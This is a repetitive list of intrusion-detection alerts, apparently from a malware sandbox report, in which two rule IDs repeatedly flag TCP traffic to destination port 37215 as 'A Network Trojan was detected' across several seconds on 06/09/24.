          SID:2829579
          Source Port:49332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397211
          SID:2835222
          Source Port:44254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286547
          SID:2835222
          Source Port:32956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298248
          SID:2829579
          Source Port:41058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558381
          SID:2829579
          Source Port:33920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915032
          SID:2829579
          Source Port:52666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715055
          SID:2835222
          Source Port:34024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.658376
          SID:2829579
          Source Port:52932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869906
          SID:2835222
          Source Port:53006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033047
          SID:2835222
          Source Port:55664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.474541
          SID:2835222
          Source Port:51248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249318
          SID:2829579
          Source Port:56416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720984
          SID:2829579
          Source Port:36210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818604
          SID:2835222
          Source Port:33550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904589
          SID:2829579
          Source Port:36148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.541516
          SID:2829579
          Source Port:50030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601035
          SID:2835222
          Source Port:41838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399836
          SID:2835222
          Source Port:49990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714159
          SID:2835222
          Source Port:56802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252204
          SID:2829579
          Source Port:55440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718953
          SID:2829579
          Source Port:45494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038298
          SID:2835222
          Source Port:50122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288503
          SID:2835222
          Source Port:54718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.691986
          SID:2835222
          Source Port:40830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.571798
          SID:2829579
          Source Port:41136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719955
          SID:2829579
          Source Port:49694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.632623
          SID:2835222
          Source Port:37556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294883
          SID:2835222
          Source Port:38902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.908823
          SID:2829579
          Source Port:55290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719371
          SID:2829579
          Source Port:58862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926134
          SID:2835222
          Source Port:58214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306629
          SID:2829579
          Source Port:38852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718710
          SID:2835222
          Source Port:34002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721357
          SID:2829579
          Source Port:46514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027277
          SID:2835222
          Source Port:56160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.954059
          SID:2835222
          Source Port:53706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993227
          SID:2829579
          Source Port:33086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606966
          SID:2829579
          Source Port:52800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823690
          SID:2829579
          Source Port:42972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.040537
          SID:2829579
          Source Port:57126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.301082
          SID:2829579
          Source Port:58152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034262
          SID:2829579
          Source Port:48438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567451
          SID:2835222
          Source Port:35508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227858
          SID:2835222
          Source Port:46446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820823
          SID:2835222
          Source Port:35242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720189
          SID:2829579
          Source Port:45962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014288
          SID:2835222
          Source Port:43906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598534
          SID:2829579
          Source Port:40318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.280690
          SID:2829579
          Source Port:34716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294483
          SID:2835222
          Source Port:33872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563444
          SID:2835222
          Source Port:34022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289513
          SID:2835222
          Source Port:43820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.131169
          SID:2829579
          Source Port:41778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120583
          SID:2835222
          Source Port:59908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860789
          SID:2829579
          Source Port:41134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.594145
          SID:2829579
          Source Port:41740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.915052
          SID:2835222
          Source Port:42236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945715
          SID:2829579
          Source Port:39658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289150
          SID:2829579
          Source Port:35562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820722
          SID:2829579
          Source Port:42358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163924
          SID:2829579
          Source Port:35258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820974
          SID:2829579
          Source Port:50326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034345
          SID:2829579
          Source Port:54586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.357425
          SID:2835222
          Source Port:53186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168353
          SID:2835222
          Source Port:40578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471749
          SID:2835222
          Source Port:43180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286180
          SID:2829579
          Source Port:58226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.121486
          SID:2835222
          Source Port:48698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991884
          SID:2835222
          Source Port:56606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.942117
          SID:2835222
          Source Port:58686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120576
          SID:2835222
          Source Port:44770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.653004
          SID:2835222
          Source Port:52806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244741
          SID:2835222
          Source Port:37618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289024
          SID:2835222
          Source Port:49388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103836
          SID:2829579
          Source Port:33390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037671
          SID:2829579
          Source Port:53412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247268
          SID:2835222
          Source Port:52818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.278914
          SID:2829579
          Source Port:48882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721655
          SID:2835222
          Source Port:33734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476576
          SID:2835222
          Source Port:59418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081758
          SID:2829579
          Source Port:52994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929844
          SID:2829579
          Source Port:52274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034031
          SID:2829579
          Source Port:46072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398657
          SID:2835222
          Source Port:37004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399252
          SID:2829579
          Source Port:46774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037066
          SID:2835222
          Source Port:50510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283148
          SID:2835222
          Source Port:44278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.605639
          SID:2829579
          Source Port:46050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252621
          SID:2835222
          Source Port:39718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274539
          SID:2835222
          Source Port:42044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104402
          SID:2829579
          Source Port:54918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868922
          SID:2835222
          Source Port:56812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538144
          SID:2829579
          Source Port:56560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166729
          SID:2835222
          Source Port:41766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413682
          SID:2835222
          Source Port:44526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603453
          SID:2835222
          Source Port:44224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643561
          SID:2835222
          Source Port:44212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993391
          SID:2835222
          Source Port:41054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159405
          SID:2835222
          Source Port:51582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.895670
          SID:2835222
          Source Port:54308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225135
          SID:2829579
          Source Port:52362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928908
          SID:2835222
          Source Port:51812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916913
          SID:2835222
          Source Port:36374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205651
          SID:2835222
          Source Port:47756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558025
          SID:2829579
          Source Port:57034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.560402
          SID:2835222
          Source Port:39928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950882
          SID:2829579
          Source Port:51764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291549
          SID:2829579
          Source Port:51022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289752
          SID:2835222
          Source Port:38150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539978
          SID:2829579
          Source Port:52954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867932
          SID:2835222
          Source Port:59500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721544
          SID:2835222
          Source Port:59530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076434
          SID:2829579
          Source Port:45956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.908938
          SID:2835222
          Source Port:43996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.419073
          SID:2835222
          Source Port:40012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226807
          SID:2829579
          Source Port:36804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.077348
          SID:2829579
          Source Port:42334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032814
          SID:2835222
          Source Port:59740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862671
          SID:2829579
          Source Port:46490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.155835
          SID:2829579
          Source Port:52204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161325
          SID:2829579
          Source Port:52492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249433
          SID:2835222
          Source Port:50010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010906
          SID:2835222
          Source Port:34728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.894408
          SID:2829579
          Source Port:46532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924487
          SID:2829579
          Source Port:48296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598642
          SID:2835222
          Source Port:59970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557408
          SID:2835222
          Source Port:59774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400319
          SID:2835222
          Source Port:43178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.134734
          SID:2835222
          Source Port:55648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274218
          SID:2835222
          Source Port:42914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929892
          SID:2829579
          Source Port:38974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399031
          SID:2835222
          Source Port:53262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206701
          SID:2829579
          Source Port:46556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225899
          SID:2829579
          Source Port:50424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282352
          SID:2835222
          Source Port:46624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600385
          SID:2835222
          Source Port:37228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413950
          SID:2829579
          Source Port:34768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.280607
          SID:2835222
          Source Port:39772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282395
          SID:2835222
          Source Port:47990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718348
          SID:2835222
          Source Port:37846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928411
          SID:2835222
          Source Port:47464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033203
          SID:2829579
          Source Port:45840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230808
          SID:2829579
          Source Port:54002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989661
          SID:2829579
          Source Port:38204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249491
          SID:2829579
          Source Port:45346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644929
          SID:2835222
          Source Port:43888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164399
          SID:2829579
          Source Port:56330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030869
          SID:2835222
          Source Port:52906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.085492
          SID:2835222
          Source Port:60098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564978
          SID:2829579
          Source Port:59132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.251305
          SID:2835222
          Source Port:48874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412952
          SID:2829579
          Source Port:40168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715506
          SID:2829579
          Source Port:60420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914377
          SID:2835222
          Source Port:55884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.090062
          SID:2835222
          Source Port:44878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468394
          SID:2835222
          Source Port:56048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557617
          SID:2829579
          Source Port:56588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568072
          SID:2829579
          Source Port:38086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721256
          SID:2829579
          Source Port:52386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719466
          SID:2835222
          Source Port:55248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821239
          SID:2829579
          Source Port:41750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721271
          SID:2835222
          Source Port:43768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718297
          SID:2835222
          Source Port:47612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033627
          SID:2829579
          Source Port:50494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286019
          SID:2835222
          Source Port:37146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400181
          SID:2835222
          Source Port:51664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925237
          SID:2829579
          Source Port:60632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.026963
          SID:2835222
          Source Port:51610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102602
          SID:2829579
          Source Port:35070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.289145
          SID:2829579
          Source Port:60708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469725
          SID:2835222
          Source Port:59226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246601
          SID:2829579
          Source Port:55902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567681
          SID:2835222
          Source Port:47862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919189
          SID:2829579
          Source Port:52808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158293
          SID:2829579
          Source Port:43880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716730
          SID:2835222
          Source Port:51018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028952
          SID:2835222
          Source Port:37266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718872
          SID:2835222
          Source Port:38058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821943
          SID:2835222
          Source Port:49940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991783
          SID:2835222
          Source Port:41354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.289937
          SID:2835222
          Source Port:35652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720930
          SID:2835222
          Source Port:49422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159262
          SID:2835222
          Source Port:43064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288546
          SID:2829579
          Source Port:35534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224487
          SID:2829579
          Source Port:39074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713532
          SID:2835222
          Source Port:54122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564171
          SID:2835222
          Source Port:45942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920133
          SID:2829579
          Source Port:59344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031618
          SID:2835222
          Source Port:49712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644537
          SID:2835222
          Source Port:36838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716034
          SID:2835222
          Source Port:49110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465996
          SID:2835222
          Source Port:36640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160467
          SID:2829579
          Source Port:47450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.945898
          SID:2829579
          Source Port:52268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.094496
          SID:2835222
          Source Port:59196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010049
          SID:2829579
          Source Port:57550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306361
          SID:2835222
          Source Port:60526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205194
          SID:2835222
          Source Port:36064
          Destination Port:37215
